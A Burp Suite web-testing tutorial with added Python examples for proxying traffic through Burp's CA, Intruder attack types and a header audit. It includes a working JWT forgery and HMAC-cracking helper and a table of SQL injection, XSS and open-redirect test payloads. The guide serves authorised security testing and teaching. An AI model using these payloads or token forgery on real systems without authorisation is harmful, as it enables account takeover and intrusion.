
Burp Suite

🧠 What is Burp Suite?

Burp Suite is a powerful web security testing tool developed by PortSwigger. It allows testers to intercept, analyze, and manipulate HTTP/S traffic between a browser and a target application to find vulnerabilities.


💻 1. Installation & Setup

🐧 Linux / 🪟 Windows / 🍎 macOS

Download Community or Professional Edition:
👉 https://portswigger.net/burp

🐳 Docker (optional for headless scanning)

Burp is a desktop GUI application, so running it in Docker is uncommon. The exceptions are headless use of Burp Professional through its REST API, and Burp Suite Enterprise Edition, which is a server-side product.


🌐 2. Configure Your Browser

A. Set Proxy

  1. Burp's default proxy listener is 127.0.0.1:8080 (Proxy > Proxy settings)

  2. Point the browser's HTTP and HTTPS proxy at that address, or use Burp's built-in Chromium browser, which is already configured

B. Install Burp's CA Certificate

  1. With the proxy configured, visit http://burpsuite (Burp answers this hostname itself)

  2. Click "CA Certificate" to download the certificate in DER format

  3. Import it into the browser's trusted root CA store (Firefox keeps its own store; Chrome and Edge use the operating system store)

✅ Necessary for HTTPS interception: Burp generates a certificate per site, signed by this CA, and the browser rejects them until the CA is trusted
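The same setup is needed for scripted traffic (API clients, test harnesses) that should be visible in Burp. The following is an added example, not code from the page or from PortSwigger: it fetches Burp's CA over the proxy, converts it from DER to PEM with the standard library, and sends a request through the proxy trusting that CA. It assumes the default listener 127.0.0.1:8080 and the http://burpsuite/cert download URL; the output file name burp-ca.pem is arbitrary.

```python
"""Route scripted HTTP(S) traffic through Burp and trust its CA.

Added example, not part of the original page. Assumes Burp's proxy listener
is on 127.0.0.1:8080 (the default) and that the CA is served at
http://burpsuite/cert, which only resolves while Burp is the proxy.
"""
import ssl
import urllib.request
from typing import Optional, Tuple

BURP_PROXY = "http://127.0.0.1:8080"
CA_URL = "http://burpsuite/cert"      # served by Burp itself, in DER form
CA_PEM_PATH = "burp-ca.pem"           # arbitrary local file name


def der_to_pem(der_bytes: bytes) -> str:
    """Burp hands out its CA as DER; most TLS libraries want PEM."""
    return ssl.DER_cert_to_PEM_cert(der_bytes)


def build_opener(ca_pem_path: Optional[str]) -> urllib.request.OpenerDirector:
    """Opener that sends http and https through Burp; when a CA file is given,
    TLS connections trust only that CA (which is all Burp-in-the-middle needs)."""
    handlers = [urllib.request.ProxyHandler({"http": BURP_PROXY, "https": BURP_PROXY})]
    if ca_pem_path is not None:
        ctx = ssl.create_default_context(cafile=ca_pem_path)
        handlers.append(urllib.request.HTTPSHandler(context=ctx))
    return urllib.request.build_opener(*handlers)


def fetch_burp_ca(pem_path: str = CA_PEM_PATH) -> str:
    """Download the CA over plain HTTP via the proxy and store it as PEM."""
    opener = build_opener(None)           # no TLS involved in this download
    with opener.open(CA_URL, timeout=10) as resp:
        pem = der_to_pem(resp.read())
    with open(pem_path, "w") as fh:
        fh.write(pem)
    return pem_path


def get_through_burp(url: str, pem_path: str = CA_PEM_PATH) -> Tuple[int, bytes]:
    """GET a URL through Burp; the request then shows up in Proxy > HTTP history."""
    opener = build_opener(pem_path)
    with opener.open(url, timeout=15) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    fetch_burp_ca()
    status, body = get_through_burp("https://example.com/")
    print(status, len(body))
```

Without the CA step the HTTPS call fails certificate verification, which is the scripted equivalent of the browser warning; disabling verification instead would also hide a real man-in-the-middle on the way to the target.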


🧭 3. Burp Suite Modules Overview

Tool       Description
---------  -------------------------------------------------------------------
Proxy      Intercepts HTTP requests/responses; HTTP history records everything that passed through
Target     Site map plus scope definition
Repeater   Modify and resend individual requests manually
Intruder   Automated fuzzing/parameter tampering (throttled in Community Edition)
Scanner    Automated vulnerability scanner (Pro only)
Decoder    Encode/decode data (Base64, URL, HTML, hex, etc.)
Comparer   Diff two requests or responses to find what changed
Extender   Add BApp Store or custom extensions (called the "Extensions" tab in current releases)

🔌 4. Manual Testing Workflow

Step-by-Step:

4.1 Intercept and Analyze Traffic

  • Turn Intercept ON; each request now pauses in Proxy > Intercept until you Forward or Drop it

  • Visit the site in the browser

  • Examine requests in Proxy > HTTP history, which logs all traffic whether or not Intercept is on; for browsing, leave Intercept OFF and work from the history

4.2 Define Scope

  • Go to Target > Scope

  • Include only the host(s) you are authorised to test

  • Reduces noise (enable "show only in-scope items" in HTTP history) and keeps scans and extensions from touching third-party domains

4.3 Use Repeater

  • Right-click > Send to Repeater

  • Modify headers, params, cookies

  • View response on each variation

4.4 Use Intruder (Manual Fuzzing)

  • Send request to Intruder

  • Mark injection points by wrapping each value in § markers: username=§admin§

  • Choose attack type: Sniper (one position at a time, one payload set), Battering Ram (the same payload in every position), Pitchfork (one payload set per position, walked in parallel), Cluster Bomb (every combination of the sets)

  • Load payloads (common values, wordlists); Community Edition throttles Intruder, so keep lists short there

  • Start the attack and sort results by status code, response length and response time; an outlier against the baseline is the lead to follow up in Repeater
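The four attack types differ only in how payloads are distributed across the marked positions, which is easy to get wrong when estimating request counts. The following is an added example, not PortSwigger's code: it reproduces Burp's § marker syntax over a constructed login request, generates the request set each attack type would send, and applies the same "find the outlier by status and length" triage the last step describes. The template, payload lists and function names are all constructed for illustration.

```python
"""Burp Intruder attack types reproduced for a request template.

Added example, not PortSwigger's code. Burp's §...§ marker syntax is real;
the request template, payload lists and helper names are constructed.
"""
import itertools
import re
from collections import Counter
from typing import Iterable, Iterator, List, Sequence, Tuple

MARKER = re.compile(r"§(.*?)§")

# Constructed login request as it looks in Intruder after marking two positions.
TEMPLATE = (
    "POST /login HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=§admin§&password=§letmein§"
)


def positions(template: str) -> List[str]:
    """Original value inside each §...§ position, left to right."""
    return MARKER.findall(template)


def render(template: str, values: Sequence[str]) -> str:
    """Replace the marked positions with one value each, left to right."""
    it = iter(values)
    return MARKER.sub(lambda m: next(it), template)


def sniper(template: str, payloads: Sequence[str]) -> Iterator[str]:
    """One position at a time, one payload set; other positions keep their original value."""
    base = positions(template)
    for i in range(len(base)):
        for p in payloads:
            vals = list(base)
            vals[i] = p
            yield render(template, vals)


def battering_ram(template: str, payloads: Sequence[str]) -> Iterator[str]:
    """The same payload placed into every position at once (one payload set)."""
    n = len(positions(template))
    for p in payloads:
        yield render(template, [p] * n)


def pitchfork(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Set N feeds position N; sets advance together, so request count = shortest set."""
    for combo in zip(*payload_sets):
        yield render(template, list(combo))


def cluster_bomb(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Every combination across the sets; request count = product of set sizes."""
    for combo in itertools.product(*payload_sets):
        yield render(template, list(combo))


def outliers(results: Iterable[Tuple[str, int, int]]) -> List[Tuple[str, int, int]]:
    """Triage: results are (payload, status, length). Anything whose (status, length)
    pair differs from the most common pair is what you open in Repeater next."""
    results = list(results)
    baseline = Counter((s, n) for _, s, n in results).most_common(1)[0][0]
    return [r for r in results if (r[1], r[2]) != baseline]


if __name__ == "__main__":
    users = ["admin", "root", "test"]
    passwords = ["password", "letmein"]
    for name, reqs in (
        ("sniper", sniper(TEMPLATE, passwords)),
        ("battering ram", battering_ram(TEMPLATE, passwords)),
        ("pitchfork", pitchfork(TEMPLATE, [users, passwords])),
        ("cluster bomb", cluster_bomb(TEMPLATE, [users, passwords])),
    ):
        reqs = list(reqs)
        print(f"{name}: {len(reqs)} requests, first body: {reqs[0].rsplit(chr(10), 1)[-1]}")
    # Constructed results: two baseline responses and one different one.
    print(outliers([("password", 200, 512), ("letmein", 200, 512), ("admin", 302, 88)]))
```

Cluster Bomb is the one that explodes: two positions with 1,000 candidates each is a million requests, which is why Pitchfork (for credential pairs that belong together) and Sniper (for one parameter at a time) are the usual choices.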


⚔️ 5. Automated Testing with Burp Scanner (Pro Only)

Passive Scan:

  • Analyzes responses without sending extra requests (e.g., information leaks, missing security headers, cookies without Secure/HttpOnly)

  • Runs automatically on in-scope traffic as it passes through the proxy

Active Scan:

  • Right-click request > "Scan" (or "Do active scan")

  • Burp sends crafted payloads to the chosen insertion points to detect, among others:

    • SQLi, XSS

    • CSRF

    • Open redirects

    • Weak session handling

  • Active scanning sends many attack requests to the target, so confirm scope and authorisation first

Reporting:

  • Go to Dashboard > Issues

  • Click each to see evidence & remediation

  • Export as HTML/XML

❗ Burp Community does not include Burp Scanner, so neither active nor passive scanning is available; the manual workflow in section 4 is the Community approach.


🔐 6. Testing with Authentication

A. Session Cookies

  • Log in through the browser while it is proxied through Burp

  • Copy the session cookie from the request in Proxy history or Repeater

  • Reuse it in further requests manually (or let Burp's cookie jar, under Settings > Sessions, track it)

B. Basic Auth

  • Add an Authorization: Basic <base64(username:password)> header; Decoder produces the Base64 value

C. JWT Tokens

  • Analyze the JWT structure (header.payload.signature, each Base64url-encoded) in Decoder

  • Test for insecure handling: the server accepting alg "none" with an empty signature, an HMAC secret weak enough to brute-force offline, and claims (role, sub, exp) that the server trusts without re-checking
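The two checks above can be done offline before anything is sent to the target. The following is an added example, not code from the page or from PortSwigger: it signs a constructed HS256 token, decodes it the way Decoder shows it, builds the alg "none" variant with a changed role claim, and recovers a weak secret from a small constructed wordlist. The secret, claims and wordlist are invented for the example; with a real target the token comes from Proxy history and the forged token goes into Repeater.

```python
"""Manual JWT checks: decode, forge alg=none, brute-force a weak HMAC secret.

Added example, not from the page or PortSwigger. The token, secret, claims and
wordlist are constructed; only the JWT encoding rules are real.
"""
import base64
import hashlib
import hmac
import json
from typing import Dict, List, Optional, Tuple


def b64url_encode(data: bytes) -> str:
    """JWT uses Base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _encode_part(obj: Dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: Dict, payload: Dict, secret: bytes) -> str:
    """Produce a valid HS256 token (stands in for the target's issuer)."""
    signing_input = f"{_encode_part(header)}.{_encode_part(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_jwt(token: str) -> Tuple[Dict, Dict, bytes]:
    """Split and decode without verifying, exactly what Decoder shows you."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def forge_alg_none(token: str, new_claims: Dict) -> str:
    """Rebuild the token with alg=none, modified claims and an empty signature.
    A server that honours alg=none accepts this as valid."""
    header, payload, _ = decode_jwt(token)
    header = dict(header, alg="none")
    payload = dict(payload, **new_claims)
    return f"{_encode_part(header)}.{_encode_part(payload)}."


def crack_hs256(token: str, wordlist: List[str]) -> Optional[str]:
    """Offline brute force: recompute the HMAC with each candidate secret."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    signing_input = f"{h}.{p}".encode()
    for word in wordlist:
        candidate = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(candidate, target):
            return word
    return None


if __name__ == "__main__":
    # Constructed token, as if copied from a captured request.
    token = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "1001", "role": "user"}, b"secret")
    print("claims:", decode_jwt(token)[1])
    print("alg=none forgery:", forge_alg_none(token, {"role": "admin"}))
    print("secret:", crack_hs256(token, ["password", "changeme", "secret"]))
```

If crack_hs256 recovers the secret, any claim can be re-signed, which is a complete authentication bypass; the alg=none token is worth sending even when the secret holds, since the two weaknesses are independent.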

D. Re-auth With Macros (Pro)

  • Settings > Sessions (Project options > Sessions in older releases): record the login sequence as a macro, then add a session handling rule that runs it when the session has expired

πŸͺ 7. Advanced Tools

🔁 Repeater Tricks

  • Bruteforce with different payloads manually

  • Bypass client-side validation

  • Modify CSRF tokens, headers, etc.

💣 Intruder Use Cases

  • Fuzzing

  • Username enumeration

  • Hidden directory/file discovery

  • Rate-limit testing (does a lockout or delay trigger after N attempts, and does it also apply when the request varies, e.g., a changed header or letter case in the username?)

🧩 BApp Store Extensions

Go to: Extensions > BApp Store (Extender > BApp Store in older releases)
Popular extensions:

  • Autorize: replays your requests with a lower-privileged session to find authorization bypasses

  • Logger++: advanced request/response logging across all Burp tools

  • SAML Raider: SAML message manipulation and certificate tooling

  • JWT Editor: decode, edit and re-sign JWTs

  • ActiveScan++: extra checks for the Pro scanner


🧪 8. Manual Vulnerability Testing Examples

Vulnerability      How to Test Manually (Repeater/Intruder)
-----------------  ----------------------------------------------------------------------------
SQL Injection      ' or '1'='1 and ' union select null-- in a parameter; confirm with a boolean or time-based difference rather than an error message alone
XSS                <script>alert(1)</script> in query/body; check where and how the input is reflected in the response
CSRF               Copy the form, remove or swap the token, replay it in Repeater; a success means the token is not validated
Broken Auth        Modify session cookies, try forceful browsing to authenticated URLs without a session
Open Redirect      /redirect?url=https://evil.com (constructed example); check for a 3xx to the external host
Insecure Headers   Check for absence of Content-Security-Policy, X-Frame-Options, Strict-Transport-Security, X-Content-Type-Options and cookie flags
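The header row above, and the passive checks described in section 5, are easy to script over anything copied out of HTTP history. The following is an added example, not Burp's passive-scan logic: it audits a response's headers for the missing protections listed above plus cookie flags and a version-revealing Server header, run over two constructed responses (one weak, one hardened). The URLs, header values and function names are constructed for the example.

```python
"""Passive security-header audit over captured responses.

Added example, not Burp's passive scanner. The responses below are constructed;
in practice feed it headers copied from Proxy > HTTP history.
"""
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]   # (name, value) pairs, repeats allowed (Set-Cookie)


def audit_headers(url: str, headers: Headers) -> List[str]:
    """Return a list of findings for one response; empty means nothing flagged."""
    lower = {k.lower(): v for k, v in headers}
    findings: List[str] = []

    csp = lower.get("content-security-policy", "")
    if not csp:
        findings.append("missing Content-Security-Policy")
    # Either header defends against clickjacking; CSP frame-ancestors is the modern one.
    if "frame-ancestors" not in csp and "x-frame-options" not in lower:
        findings.append("clickjacking: no X-Frame-Options and no CSP frame-ancestors")
    if lower.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    # HSTS only makes sense on HTTPS responses; browsers ignore it over HTTP.
    if url.startswith("https://") and "strict-transport-security" not in lower:
        findings.append("missing Strict-Transport-Security on HTTPS response")

    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        attrs = {a.strip().split("=")[0].lower() for a in value.split(";")[1:]}
        for flag in ("secure", "httponly"):
            if flag not in attrs:
                findings.append(f"cookie {cookie_name} lacks {flag}")
        if "samesite" not in attrs:
            findings.append(f"cookie {cookie_name} lacks SameSite")

    server = lower.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append(f"Server header reveals version: {server}")
    return findings


def audit_site(responses: Dict[str, Headers]) -> Dict[str, List[str]]:
    """Audit many responses; only URLs with findings appear in the result."""
    report: Dict[str, List[str]] = {}
    for url, hdrs in responses.items():
        found = audit_headers(url, hdrs)
        if found:
            report[url] = found
    return report


# Constructed responses: a weak login page and a hardened account page.
SAMPLE_RESPONSES: Dict[str, Headers] = {
    "http://target.example/login": [
        ("Server", "Apache/2.4.41 (Ubuntu)"),
        ("Content-Type", "text/html; charset=UTF-8"),
        ("Set-Cookie", "PHPSESSID=3f9a1c; Path=/"),
    ],
    "https://target.example/account": [
        ("Server", "nginx"),
        ("Content-Type", "text/html"),
        ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
        ("X-Content-Type-Options", "nosniff"),
        ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
        ("Set-Cookie", "sid=9b2d; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ],
}

if __name__ == "__main__":
    for url, found in audit_site(SAMPLE_RESPONSES).items():
        print(url)
        for f in found:
            print("  -", f)
```

Missing headers are low severity on their own; their value in a report is as evidence of how much hardening the application has had, and as the context that turns a reflected XSS with no CSP into a higher-impact finding.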

🔍 9. Best Practices

Practice                      Why it helps
----------------------------  -----------------------------------------------------------------
Set scope early               Avoid scanning third-party or irrelevant domains you are not authorised to test
Use context menus             "Send to Repeater", "Do intercept > Response to this request", "Add to scope", etc.
Sanitize your logs            Remove credentials, tokens and personal data before sharing or reporting
Test logout + session mgmt    Check that logout invalidates the token server-side; detect session fixation and hijacking risks
Use different user roles      AuthZ testing: replay an admin's requests with a normal user's session (Autorize automates this)
Log everything                Use Logger++ or Burp's Logger tab so evidence survives beyond Proxy history

🧪 10. Practice Labs

docker run -it -p 80:80 vulnerables/web-dvwa
docker run -p 3000:3000 bkimminich/juice-shop

DVWA is then at http://localhost/ (log in with admin / password and click "Create / Reset Database" once); Juice Shop is at http://localhost:3000/. Add the relevant host to Target > Scope before browsing.

📦 11. Export Reports

Pro Version Only:

  • Dashboard > Issues (or Target > Site map > Issues): select issues, right-click > "Report issues"

  • Formats: HTML / XML; the .burp project file stores the whole project (history, scan results) and is what you save to resume work, not a report format


📚 12. Learn More